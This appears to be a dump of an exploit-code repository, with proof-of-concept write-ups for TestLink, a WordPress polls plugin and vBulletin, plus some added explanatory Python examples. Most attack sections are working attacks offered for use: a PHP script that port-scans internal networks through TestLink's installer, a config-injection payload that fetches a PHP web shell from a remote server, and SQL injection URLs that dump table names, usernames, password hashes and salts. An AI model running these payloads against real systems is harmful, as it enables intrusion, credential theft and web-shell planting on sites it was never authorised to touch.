-> Install the SAMBA server using the below mentioned command:

apt-get install samba

-> Create an SMB share directory (in my case /var/www/html/pub/)

mkdir /var/www/html/pub/

-> Configure permissions on the newly created SMB share directory:

chmod 0555 /var/www/html/pub/
chown -R nobody:nogroup /var/www/html/pub/

Run the below mentioned command to remove the default content of the SAMBA server config file:

echo > /etc/samba/smb.conf

-> Put the below mentioned content in the file '/etc/samba/smb.conf'

[global]
workgroup = WORKGROUP
server string = Samba Server %v
netbios name = indishell-lab
security = user
map to guest = bad user
name resolve order = bcast host
dns proxy = no
bind interfaces only = yes

[ica]
path = /var/www/html/pub
writable = no
guest ok = yes
guest only = yes
read only = yes
directory mode = 0555
force user = nobody

Now restart the SAMBA server to apply the new configuration specified in the config file /etc/samba/smb.conf:

service smbd restart

--------------------------------------------------------------------------------
/TestLink (version <= 1.9.19) Server Side Request Forgery/POCs/1 (Request to local machine open port).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/incredibleindishell/exploit-code-by-me/224126ea6f407a8456f1f93393135345273cb413/TestLink (version <= 1.9.19) Server Side Request Forgery/POCs/1 (Request to local machine open port).png
--------------------------------------------------------------------------------
/TestLink (version <= 1.9.19) Server Side Request Forgery/POCs/2 (Request to local machine closed port).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/incredibleindishell/exploit-code-by-me/224126ea6f407a8456f1f93393135345273cb413/TestLink (version <= 1.9.19) Server Side Request Forgery/POCs/2 (Request to local machine closed port).png
--------------------------------------------------------------------------------
/TestLink (version <= 1.9.19) Server Side Request Forgery/POCs/3 (Internal IP server and request to open port).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/incredibleindishell/exploit-code-by-me/224126ea6f407a8456f1f93393135345273cb413/TestLink (version <= 1.9.19) Server Side Request Forgery/POCs/3 (Internal IP server and request to open port).png
-------------------------------------------------------------------------------- /TestLink (version <= 1.9.19) Server Side Request Forgery/POCs/4 (Internal IP with open port).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/incredibleindishell/exploit-code-by-me/224126ea6f407a8456f1f93393135345273cb413/TestLink (version <= 1.9.19) Server Side Request Forgery/POCs/4 (Internal IP with open port).png -------------------------------------------------------------------------------- /TestLink (version <= 1.9.19) Server Side Request Forgery/POCs/5 (Internal IP with closed Port).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/incredibleindishell/exploit-code-by-me/224126ea6f407a8456f1f93393135345273cb413/TestLink (version <= 1.9.19) Server Side Request Forgery/POCs/5 (Internal IP with closed Port).png -------------------------------------------------------------------------------- /TestLink (version <= 1.9.19) Server Side Request Forgery/POCs/6 (Non-existing Internal IP).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/incredibleindishell/exploit-code-by-me/224126ea6f407a8456f1f93393135345273cb413/TestLink (version <= 1.9.19) Server Side Request Forgery/POCs/6 (Non-existing Internal IP).png -------------------------------------------------------------------------------- /TestLink (version <= 1.9.19) Server Side Request Forgery/POCs/README.md: -------------------------------------------------------------------------------- 1 | These are few POCs for the reproducing vulnerability manually. 
2 | -------------------------------------------------------------------------------- /TestLink (version <= 1.9.19) Server Side Request Forgery/POCs/script1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/incredibleindishell/exploit-code-by-me/224126ea6f407a8456f1f93393135345273cb413/TestLink (version <= 1.9.19) Server Side Request Forgery/POCs/script1.png -------------------------------------------------------------------------------- /TestLink (version <= 1.9.19) Server Side Request Forgery/POCs/script2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/incredibleindishell/exploit-code-by-me/224126ea6f407a8456f1f93393135345273cb413/TestLink (version <= 1.9.19) Server Side Request Forgery/POCs/script2.png -------------------------------------------------------------------------------- /TestLink (version <= 1.9.19) Server Side Request Forgery/README.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | # TestLink (version <= 1.9.19) Server Side Request Forgery 4 | 5 | 6 | TestLink (version <= 1.9.19) is vulnerable to Un-Autheticated Server-Side Request Forgery (SSRF) which allow an attacker to perform Network device Port 7 | scanning. Device may be the same which is hosting Testlink code or it may be connected to the same network. 8 | This issue exists in script "install/installNewDB.php" and affected parameter is "databasehost". 9 | 10 | This issue exists in script "install/installNewDB.php" and affected parameter is "databasehost". 11 | There is one interesting thing about TestLink is, any user can access "install/installNewDB.php" web page and can perform Re-Installation by specifying valid Remote MySQL server credentials. 
This is strange behaviour because generally CMSs or other self-installing script does not allow user to do so if it is connected to a database having content in it. 12 | Now, attacker can take advantage of this behaviour. Attacker just need to intercept the POST method HTTP request in which TesLink is trying to connect to remote/local SQL server. 13 | 14 | Script behaviour to enumerate open or closed port 15 | ================================================= 16 | In the HTTP request, we have HTTP POST method parameter "databasehost" which actually contains the "localhost" or remote_IP value. But if we change the value to "localhost:port" or "internal_IP:port" or "external_IP:port", script try to connect to the server on the port specified. For example, value is "localhost:445", script is trying to connect to localhost on port 445. Here, if machine is having port 445 open, script connects to port 445 but as we know port is running SMB service and SQL server is not there, script consider that SQL server is dead on this port. Script print SQL server message "MySQL server has gone away" (in my case it was MySQL). Another case, if we specify the value of "databasehost" parameter as "localhost:1337" and here port 1337 is not open, script shows SQL server error message " No connection could be made because the target machine actively refused it." which clearly indicates that port 1337 is not open. 17 | 18 | Example of Open port enumeration 19 | ================================ 20 | Let's consider case of internal IP on same network. We have server IP 192.168.56.101 which is hosting TestLink code hosted on it and one Linux server 21 | with IP 192.168.56.105 having SSH port open on it. If we specify the value of "databasehost" parameter as "192.168.56.105:22", TestLink script try to connect to IP 192.168.56.105 on Port 22 and print SQL server message "MySQL server has gone away" as port s open but it's having SSH running on it. 
Example of non-existing IP
==========================
Now consider a host that does not exist on the network, say 192.168.56.145. Whatever port we try, the script responds with the SQL error "A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond", which indicates that the IP is not live (or that something in between silently drops the packets; a timeout cannot tell the two apart).

The scenario above shows how an attacker can use the TestLink installer to scan network IPs and their open ports.

Steps to Reproduce (Manual):
============================
1. Configure your web browser to use an intercepting proxy (I am using Burp Suite).
2. Open the URL below in the browser and click the "Continue" button:
   http://localhost/testlink-1.9.19/install/installCheck.php?licenseOK=on
3. Turn on Burp interception.
4. In the browser, fill in the input fields (database admin login/password etc.) and click the "Process TestLink Setup" button.
5. In Burp Proxy, send the intercepted request to Burp Repeater with "CTRL+R".
6. In Burp Repeater, change the value of the POST parameter "databasehost" from "localhost" to "localhost:22" (if your machine is Linux with SSH running), then click "Go".
7. The response in the Repeater response tab shows "MySQL server has gone away".
8. Change the value of "databasehost" from "localhost:22" to "localhost:1337" and click "Go" again.
9. The response now carries the closed-port error "No connection could be made because the target machine actively refused it." (a closed port on the local machine is refused immediately; the timeout message quoted above for a non-existing IP appears only when the host does not answer at all).

Automated script in action
==========================

The vulnerable TestLink installation directory is "http://localhost/testlink-1.9.19/".
The target being scanned is 192.168.0.2.

![POC 1](https://raw.githubusercontent.com/incredibleindishell/exploit-code-by-me/master/TestLink%20(version%20%3C%3D%201.9.19)%20Server%20Side%20Request%20Forgery/POCs/script1.png)

Result after the scan finishes:

![POC 2](https://raw.githubusercontent.com/incredibleindishell/exploit-code-by-me/master/TestLink%20(version%20%3C%3D%201.9.19)%20Server%20Side%20Request%20Forgery/POCs/script2.png)

--==[[ Greetz To ]]==--

Guru ji zero, code breaker ica, root_devil, google_warrior, INX_r0ot, Darkwolf indishell, Baba,
Silent poison India, Magnum sniper, ethicalnoob Indishell, Reborn India, L0rd Crus4d3r, cool toad,
Hackuin, Alicks, mike waals, cyber gladiator, Cyber Ace, Golden boy INDIA, d3, rafay baloch, nag256,
Ketan Singh, AR AR, saad abbasi, Minhal Mehdi, Raj bhai ji, Hacking queen, lovetherisk, Bikash Dash

--==[[Love to]]==--

My Father, my Ex Teacher, cold fire hacker, Mannu, ViKi, Ashu bhai ji, Soldier Of God, Bhuppi, Gujjar PCP,
Mohit, Ffe, Ashish, Shardhanand, Budhaoo, Jagriti, Salty, Hacker fantastic, Jennifer Arcuri, Thecolonial and Don(Deepika kaushik)

--------------------------------------------------------------------------------
/TestLink (version <= 1.9.19) Server Side Request Forgery/testlink_ssrf.php:
--------------------------------------------------------------------------------
[Lines 1-279: HTML page template and the input form with the fields "Target URL", "Ports to be scan" and "Host to be scan"; only the labels survived. The PHP that processes the form follows.]
```php
<?php
// testlink_ssrf.php, recovered portion. Lines 1-279 of the original (the
// HTML page template, the input form "Target URL" / "Ports to be scan" /
// "Host to be scan" and the code that reads it) are not present in this
// copy; the three assignments below stand in for them, and the form field
// names are assumed, not the originals.
$url_auth = isset($_POST['url'])   ? trim($_POST['url'])   : '';  // TestLink installer URL (assumed field name)
$h0st     = isset($_POST['host'])  ? trim($_POST['host'])  : '';  // host to scan through the installer (assumed)
$list     = isset($_POST['ports']) ? trim($_POST['ports']) : '';  // comma-separated port list (assumed)

// Reachability check, reconstructed: the original aborted with the alert
// below when the target URL could not be fetched.
$check = curl_init($url_auth);
curl_setopt($check, CURLOPT_RETURNTRANSFER, true);
curl_setopt($check, CURLOPT_TIMEOUT, 5);
$reachable = ($url_auth !== '' && curl_exec($check) !== false);
curl_close($check);

if (!$reachable)
{
    echo "<script>alert('Target is unreachable, Get me something working :|');</script>";
    die();
}

////////////////////////////
///Time to get back to work
///////////////////////////

else
{
    echo "<br>";

    // explode() handles a single port too, so a comma is not required
    // (the original only scanned when the list contained ",").
    $all_ports = array_values(array_filter(array_map('trim', explode(',', $list)), 'strlen'));
    $ch      = array();
    $content = array();
    $open    = array();
    $closed  = array();

    $mh = curl_multi_init();
    $i  = 0;

    // One installer POST per port; only databasehost varies between them.
    foreach ($all_ports as $port)
    {
        $payload = "isNew=1&databasetype=mysql&databasehost=$h0st:$port&databasename=testlink3&tableprefix=box3&databaseloginname=indishell&databaseloginpassword=tost&tl_loginname=root&tl_loginpassword=";

        $ch[$i] = curl_init();
        curl_setopt($ch[$i], CURLOPT_URL, $url_auth);
        curl_setopt($ch[$i], CURLOPT_HEADER, 0);
        curl_setopt($ch[$i], CURLOPT_TIMEOUT, 5);
        curl_setopt($ch[$i], CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch[$i], CURLOPT_POST, 1);
        curl_setopt($ch[$i], CURLOPT_POSTFIELDS, $payload);

        curl_multi_add_handle($mh, $ch[$i]);
        $i++;
    }

    $active = null;
    do
    {
        $mrc = curl_multi_exec($mh, $active);
        usleep(200000); // limit requests for a while
    } while ($active);

    foreach ($ch as $i => $c)
    {
        $content[$i] = curl_multi_getcontent($c);
        curl_multi_remove_handle($mh, $c);
    }

    curl_multi_close($mh);

    // Classify by the database error echoed back (MySQL backend on a Windows
    // host, as in the README). The original treated every reply without
    // "refused" as open, which also counted timeouts from dead hosts as open.
    for ($j = 0; $j < count($content); $j++)
    {
        if (strstr($content[$j], 'refused') !== false)
        {
            array_push($closed, $all_ports[$j]);
        }
        elseif (strstr($content[$j], 'gone away') !== false)
        {
            array_push($open, $all_ports[$j]);
        }
        // anything else (timeout, empty reply) is left unclassified
    }

    // Result table; the tags are reconstructed, only the cell text survived.
    echo '<table><tr><th>--==[[ Open Ports on Target server '.$h0st.' ]]==--</th></tr>';
    foreach ($open as $in_open)
    {
        echo '<tr><td>Port '.$in_open.'</td></tr>';
    }
    echo '</table>';
}

echo "Developed By 1046 at IndiShell Lab";
?>
```
--------------------------------------------------------------------------------
/TestLink -below 1.9.17- Remote Code Execution/README.md:
--------------------------------------------------------------------------------
# Title: TestLink Open Source Test Management (<= 1.9.16) Remote Code Execution By Manish (error1046)
Vendor Home Page: http://testlink.org

Discovered At: Indishell Lab

CVE ID: CVE-2018-7466

///////////
//Overview
///////////

TestLink (versions below 1.9.17) is vulnerable to Remote Code Execution.
The vulnerable code is in the file "install/installNewDB.php". TestLink allows a user to re-install it: when the user visits the "/install/" directory and reaches the "Database detail" page, i.e. "install/installNewDB.php", the "TestLink DB login" field accepts PHP code.
After a successful installation, that PHP code is saved into the config file.


Exploitation


During the installation process the script first tries to connect to the MySQL "root" account supplied by the user; if it can reach the MySQL server (locally or remotely hosted), the CMS installation proceeds.

The script saves the MySQL server host, username and password in the config file.

An attacker can take advantage of this process to write PHP code into the config file.

To do this, the attacker needs to set up a MySQL server on a machine and configure it to accept connections from remote IPs, which is easily done by changing parameters in the my.cnf file:

-> comment out skip-networking as well as bind-address (if present in my.cnf), i.e. change the line

skip-networking
to
# skip-networking

and

bind-address = some_ip
to
#bind-address = some_ip

-> save my.cnf and reload/restart the MySQL server; it will now accept remote connections from any IP.

Now configure the MySQL root user so that the remote script is allowed to log in as root: the account needs a host entry that matches the TestLink server's address (for example 'root'@'%'), not only 'root'@'localhost'.

With an attacker-controlled MySQL server listening for remote connections, the attacker supplies its IP, the root username and password, and puts the following PHP code in the "TestLink DB login" field (the HTTP POST parameter tl_loginname):

"box');file_put_contents($_GET[1],file_get_contents($_GET[2]));//"

Once the script establishes a connection to the root account of the remote MySQL server, it creates a MySQL user named
"box');file_put_contents($_GET[1],file_get_contents($_GET[2]));//" and writes that username into the config_db.inc.php file.
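The config write is the step that turns the user name into code, and the reason is the quoting. The following added example (written for this page, not TestLink's code) simulates the write in Python: the vulnerable rendering drops the value straight into a PHP single-quoted literal, so the ');' ends the define() call, the file_put_contents() becomes a second statement, and the trailing '//' comments out what is left of the original line; the hardened rendering encodes the value as a PHP literal first, so the same payload stays inside the string. It assumes config_db.inc.php stores credentials as define('DB_USER', '...') style lines, which the page does not show.

```python
"""Added example, not TestLink's code: a simulation of the config write that
turns the injected "TestLink DB login" value into PHP code, beside a
rendering that keeps the value inside the string literal.

Assumption: config_db.inc.php stores the credentials as PHP define() calls
with single-quoted values, i.e. define('DB_USER', '<value>'); the exact
layout of TestLink's file is not shown on the page.
"""

PAYLOAD = "box');file_put_contents($_GET[1],file_get_contents($_GET[2]));//"


def render_config_db_vulnerable(host: str, user: str, password: str) -> str:
    """Interpolate the values straight into the template, the behaviour the write-up describes."""
    return (
        "<?php\n"
        f"define('DB_HOST', '{host}');\n"
        f"define('DB_USER', '{user}');\n"
        f"define('DB_PASS', '{password}');\n"
    )


def php_single_quoted(value: str) -> str:
    """Encode value as a PHP single-quoted literal: only backslash and quote need escaping."""
    return "'" + value.replace("\\", "\\\\").replace("'", "\\'") + "'"


def render_config_db_safe(host: str, user: str, password: str) -> str:
    """Same template, but every value is encoded as a literal before insertion."""
    return (
        "<?php\n"
        f"define('DB_HOST', {php_single_quoted(host)});\n"
        f"define('DB_USER', {php_single_quoted(user)});\n"
        f"define('DB_PASS', {php_single_quoted(password)});\n"
    )


def statements_in_db_user_line(config: str) -> list:
    """Split the DB_USER line into top-level PHP statements, honouring single-quoted
    strings (with \\' escapes) and a trailing // comment. A clean line has exactly one."""
    line = next(l for l in config.splitlines() if l.startswith("define('DB_USER'"))
    stmts, cur, in_str, i = [], "", False, 0
    while i < len(line):
        c = line[i]
        if in_str:
            cur += c
            if c == "\\" and i + 1 < len(line):  # escaped character inside the literal
                cur += line[i + 1]
                i += 1
            elif c == "'":
                in_str = False
        elif c == "'":
            in_str = True
            cur += c
        elif line.startswith("//", i):           # rest of the line is a comment
            break
        elif c == ";":
            stmts.append(cur.strip())
            cur = ""
        else:
            cur += c
        i += 1
    if cur.strip():
        stmts.append(cur.strip())
    return stmts


if __name__ == "__main__":
    for render in (render_config_db_vulnerable, render_config_db_safe):
        cfg = render("10.0.0.9", PAYLOAD, "pw")
        print(render.__name__, statements_in_db_user_line(cfg))
```

The statement splitter doubles as a quick integrity check for an incident responder: run it over a config_db.inc.php taken from a suspect install and any DB_USER line that yields more than one statement, or a statement that is not the define() call, has been tampered with.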
After that, the attacker only needs to request the config file config_db.inc.php with the following GET parameters:

http://testlink/config_db.inc.php?1=ica.php&2=http://remote_server/php_web_shell.txt

This drops the PHP web shell into the base directory under the name ica.php. (Fetching the shell over HTTP with file_get_contents() relies on allow_url_fopen being enabled in php.ini, which it is by default.)

![POC](https://raw.githubusercontent.com/incredibleindishell/exploit-code-by-me/master/TestLink%20-below%201.9.17-%20Remote%20Code%20Execution/testlink%20POC.png)

--==[[ Greetz To ]]==--

Guru ji zero, code breaker ica, root_devil, google_warrior, INX_r0ot, Darkwolf indishell, Baba,
Silent poison India, Magnum sniper, ethicalnoob Indishell, Reborn India, L0rd Crus4d3r, cool toad,
Hackuin, Alicks, mike waals, cyber gladiator, Cyber Ace, Golden boy INDIA, d3, rafay baloch, nag256,
Ketan Singh, AR AR, saad abbasi, Minhal Mehdi, Raj bhai ji, Hacking queen, lovetherisk, Bikash Dash

--==[[Love to]]==--

My Father, my Ex Teacher, cold fire hacker, Mannu, ViKi, Ashu bhai ji, Soldier Of God, Bhuppi, Gujjar PCP,
Mohit, Ffe, Ashish, Shardhanand, Budhaoo, Jagriti, Salty, Hacker fantastic, Jennifer Arcuri and Don(Deepika kaushik)


--------------------------------------------------------------------------------
/TestLink -below 1.9.17- Remote Code Execution/testlink POC.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/incredibleindishell/exploit-code-by-me/224126ea6f407a8456f1f93393135345273cb413/TestLink -below 1.9.17- Remote Code Execution/testlink POC.png
--------------------------------------------------------------------------------
/WordPress Polls plugin-1.2.4- SQL Injection vulnerability/README.md:
--------------------------------------------------------------------------------
Exploit Title: WordPress Polls plugin (1.2.4) SQL Injection vulnerability
Vulnerable version: <=1.2.4

Download Link : https://downloads.wordpress.org/plugin/polls-widget.1.2.4.zip

////////////////////////
/// Overview:
////////////////////////

The WordPress Polls plugin is a tool for creating polls and survey forms, usable in widgets, posts and pages. The plugin accepts a user's answer through the survey form, and during this process the HTTP POST parameter "question_id" goes into a SQL query without sanitization, which gives rise to a SQL injection vulnerability. The vulnerable code is in the "fornt_end/fornt_end.php" file.


////////////////
/// POC ////
///////////////

SQL Injection payload to enumerate tables
----------------------------------------------
http://ica.lab/wp-admin/admin-ajax.php?action=pollinsertvalues

Post data

question_id=-3 union select concat(0x3c62723e3c666f6e7420636f6c6f723d626c61636b2073697a653d343e3c623e2d2d3d3d5b5b20496e64695368656c6c204c61625d5d3d3d2d2d203c62723e4461746162617365204e616d653a202d ,database(),0x3c62723e,0x446174616261736520557365723a202d20,user(),0x3c62723e,group_concat(0x3c62723e,table_name,0x7e,column_name),0x3c62723e,0x3c62723e3c62723e3c62723e),2 from information_schema.columns where table_schema=database()--&poll_answer_securety=0c7d4ce561&date_answers[0]=5

The negative question_id makes the plugin's own SELECT return nothing, so the page renders only the UNION row; the injected SELECT must return the same number of columns as the original query (two here). The hex literals are plain strings that avoid quoting: 0x3c62723e is "<br>" and the long leading one is an "--==[[ IndiShell Lab]]==-- Database Name:" banner, so the result reads cleanly in the page. The poll_answer_securety value appears to be a per-form token; take the current one from a live vote request on the target.

![POC](https://raw.githubusercontent.com/incredibleindishell/exploit-code-by-me/224126ea6f407a8456f1f93393135345273cb413/WordPress%20Polls%20plugin-1.2.4-%20SQL%20Injection%20vulnerability/injected.png)
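The pattern behind that payload, an integer parameter concatenated into the query and a UNION with a matching column count, is easiest to see offline. The following is an added example, not the plugin's code: it reproduces the vulnerable lookup and a hardened one against an in-memory SQLite database, with a constructed schema (a polls table and a wp_users table to leak); the plugin's real query is not quoted on the page, so the handler shape is an assumption. The MySQL-only parts of the page's payload (information_schema.columns, database(), group_concat with a separator) are swapped for their SQLite equivalents (sqlite_master, group_concat).

```python
"""Added example, not the plugin's code: the injection pattern behind the
"question_id" payload, reproduced offline against SQLite so it runs without
WordPress. The schema and the vote-handler shape are assumptions; the
plugin's own query is not quoted on the page. MySQL-only pieces of the
payload are replaced by SQLite equivalents (sqlite_master, group_concat).
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample schema: a polls table and a user table worth leaking."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE poll_questions (id INTEGER PRIMARY KEY, title TEXT, votes INTEGER);
        CREATE TABLE wp_users (user_login TEXT, user_pass TEXT);
        INSERT INTO poll_questions VALUES (3, 'Favourite colour?', 7);
        INSERT INTO wp_users VALUES ('admin', '$P$BfakeHashForDemo');
        """
    )
    return conn


def lookup_question_vulnerable(conn, question_id: str):
    """The vulnerable shape: the request parameter is concatenated into the SQL."""
    sql = f"SELECT title, votes FROM poll_questions WHERE id = {question_id}"
    return conn.execute(sql).fetchall()


def lookup_question_safe(conn, question_id: str):
    """Hardened: the id is validated as an integer and bound as a parameter."""
    try:
        qid = int(question_id)  # rejects anything that is not a plain number
    except ValueError:
        raise ValueError("question_id must be an integer") from None
    return conn.execute(
        "SELECT title, votes FROM poll_questions WHERE id = ?", (qid,)
    ).fetchall()


def rejects(conn, question_id: str) -> bool:
    """True when the hardened lookup refuses the value."""
    try:
        lookup_question_safe(conn, question_id)
    except ValueError:
        return True
    return False


# Same structure as the page's payload: a negative id so the real query
# returns nothing, then a UNION with the same column count (two).
TABLE_ENUM_PAYLOAD = "-3 union select group_concat(name, '<br>'), 2 from sqlite_master--"
CREDS_PAYLOAD = "-3 union select group_concat(user_login || ':' || user_pass), 2 from wp_users--"


def leaked_tables(conn) -> list:
    """Run the table-enumeration payload through the vulnerable lookup."""
    rows = lookup_question_vulnerable(conn, TABLE_ENUM_PAYLOAD)
    return rows[0][0].split("<br>")


def leaked_credentials(conn) -> str:
    """Run the credential-dump payload through the vulnerable lookup."""
    rows = lookup_question_vulnerable(conn, CREDS_PAYLOAD)
    return rows[0][0]


if __name__ == "__main__":
    db = make_db()
    print("tables:", leaked_tables(db))
    print("creds:", leaked_credentials(db))
    print("safe handler rejects payload:", rejects(db, TABLE_ENUM_PAYLOAD))
```

The fix is the usual one: cast to the expected type and bind the value, which is what $wpdb->prepare() with a %d placeholder does in WordPress. Note that escaping alone would not help here, since the injection point is a bare integer with no surrounding quotes to break out of.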

--==[[ Greetz To ]]==--
Guru ji zero, code breaker ica, root_devil, google_warrior, INX_r0ot, Darkwolf indishell, Baba,
Silent poison India, Magnum sniper, ethicalnoob Indishell, Reborn India, L0rd Crus4d3r, cool toad,
Hackuin, Alicks, mike waals, cyber gladiator, Cyber Ace, Golden boy INDIA, d3, rafay baloch, nag256,
Ketan Singh, AR AR, saad abbasi, Minhal Mehdi, Raj bhai ji, Hacking queen, lovetherisk, Bikash Dash

--==[[ Love To ]]==--
My Father, my Ex Teacher, cold fire hacker, Mannu, ViKi, Ashu bhai ji, Soldier Of God, Bhuppi,
Mohit, Ffe, Ashish, Shardhanand, Budhaoo, Jagriti, Salty, Hacker fantastic, Jennifer Arcuri and Don(Deepika kaushik)

--------------------------------------------------------------------------------
/WordPress Polls plugin-1.2.4- SQL Injection vulnerability/injected.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/incredibleindishell/exploit-code-by-me/224126ea6f407a8456f1f93393135345273cb413/WordPress Polls plugin-1.2.4- SQL Injection vulnerability/injected.png
--------------------------------------------------------------------------------
/vBulletin-forum-runner-SQL-Injection/README.md:
--------------------------------------------------------------------------------
# vBulletin-forum-runner-SQL-Injection
vBulletin versions 3.6.0 through 4.2.3 are vulnerable to SQL injection in the vBulletin core forumrunner addon.
The vulnerability was analysed and documented by Dantalion (https://enumerated.wordpress.com/2016/07/11/1/),
so credit goes to Dantalion only :)

////////////////
/// POC ////
///////////////

SQL Injection payload to enumerate table names
----------------------------------------------
http://forum_directory/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1)union select 1,2,3,(select (@x) from (select (@x:=0x00),(select (0) from (information_schema.tables)where (table_schema=database()) and (0x00) in (@x:=concat(@x,0x3c62723e,table_name))))x),5,6,7,8,9,10-- -


SQL Injection payload to enumerate column names from table "user"
----------------------------------------------------------------
http://forum_directory/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1)union select 1,2,3,(select (@x) from (select (@x:=0x00),(select (0) from (information_schema.columns)where (table_name=0x75736572) and (0x00) in (@x:=concat(@x,0x3c62723e,column_name))))x),5,6,7,8,9,10-- -


SQL Injection payload to enumerate username, password hash and salt from the "user" table
----------------------------------------------------------------------------------
http://forum_directory/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1)union select 1,2,3,(select (@x) from (select (@x:=0x00),(select (0) from (user)where (0x00) in (@x:=concat(@x,0x3c62723e,username,0x3a,password,0x3a,salt))))x),5,6,7,8,9,10-- -

How the payloads work: the leading ")" closes the parenthesised clause that postids is interpolated into, the UNION supplies ten columns to match the original query, and the fourth column carries a subquery whose WHERE clause is evaluated against every row of the target table; its side effect appends each row to the user variable @x, and the outer SELECT then reads @x, so a whole column comes back in a single cell separated by <br> (0x3c62723e). The hex literals avoid quote characters, and "-- -" comments out the rest of the query while keeping the space MySQL requires after "--". vBulletin 3.x/4.x stores the password hash as md5(md5(password) . salt), which is why the third payload pulls the salt alongside the hash.

/////////////////
exploit code ends here
--------------------------------------------------------------------------------
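Both the WordPress Polls payload earlier on this page and the three vBulletin payloads above hide their strings in MySQL hex literals, which is also what makes them hard to read in a web-server or WAF log. The following added example (written for this page; it is not part of either write-up) decodes those literals back to text, handling the URL encoding a logged request carries and the one-byte 0x00 seed that would otherwise print as an invisible NUL. The sample requests inside it are constructed from the payloads quoted on the page, not captured traffic.

```python
"""Added example, not part of the original write-ups: a decoder for the hex
literals used in the WordPress Polls and vBulletin forumrunner payloads on
this page, so an analyst reading one of these requests in a web-server or
WAF log can see the strings it carries (table names, separators, banners).

The sample requests below are constructed from the payloads quoted on the
page, not captured traffic.
"""
import re
from urllib.parse import unquote_plus

# MySQL hex literal: 0x followed by an even number of hex digits is a string
# (an odd digit count is read as a number, so those are left untouched).
HEX_LITERAL = re.compile(r"0x((?:[0-9a-fA-F]{2})+)(?![0-9a-fA-F])")


def _visible(text: str) -> str:
    """Show non-printable bytes (e.g. the 0x00 seed) as \\xNN escapes."""
    return "".join(c if c.isprintable() else f"\\x{ord(c):02x}" for c in text)


def decode_hex_literals(payload: str) -> str:
    """Replace each even-length MySQL hex literal with the quoted text it encodes."""
    def to_text(m):
        raw = bytes.fromhex(m.group(1))
        return "'" + _visible(raw.decode("latin-1")) + "'"  # quoted so boundaries stay visible
    return HEX_LITERAL.sub(to_text, payload)


def hex_strings(payload: str) -> list:
    """Just the decoded strings, in order of appearance."""
    return [bytes.fromhex(h).decode("latin-1") for h in HEX_LITERAL.findall(payload)]


def decode_request(query_or_body: str) -> str:
    """URL-decode a logged query string or form body, then decode its hex literals."""
    return decode_hex_literals(unquote_plus(query_or_body))


# Constructed samples, lifted from the two write-ups on this page.
VB_COLUMNS = ("postids=-1)union select 1,2,3,(select (@x) from (select (@x:=0x00),"
              "(select (0) from (information_schema.columns)where (table_name=0x75736572) "
              "and (0x00) in (@x:=concat(@x,0x3c62723e,column_name))))x),5,6,7,8,9,10-- -")
VB_CREDS_TAIL = "@x:=concat(@x,0x3c62723e,username,0x3a,password,0x3a,salt)"
WP_BANNER = ("0x3c62723e3c666f6e7420636f6c6f723d626c61636b2073697a653d343e3c623e2d2d3d3d5b5b"
             "20496e64695368656c6c204c61625d5d3d3d2d2d203c62723e4461746162617365204e616d653a202d")

if __name__ == "__main__":
    print(decode_hex_literals(VB_COLUMNS))
    print(hex_strings(VB_CREDS_TAIL))
    print(hex_strings(WP_BANNER))
```

Decoded, the vBulletin column payload reads `table_name='user'` and `concat(@x,'<br>',column_name)`, and the Polls banner literal turns out to be HTML (`<br><font color=black size=4><b>--==[[ IndiShell Lab]]==-- <br>Database Name: -`), which is a useful reminder that the "what" of an injection is often more obvious after decoding than the regex that caught it.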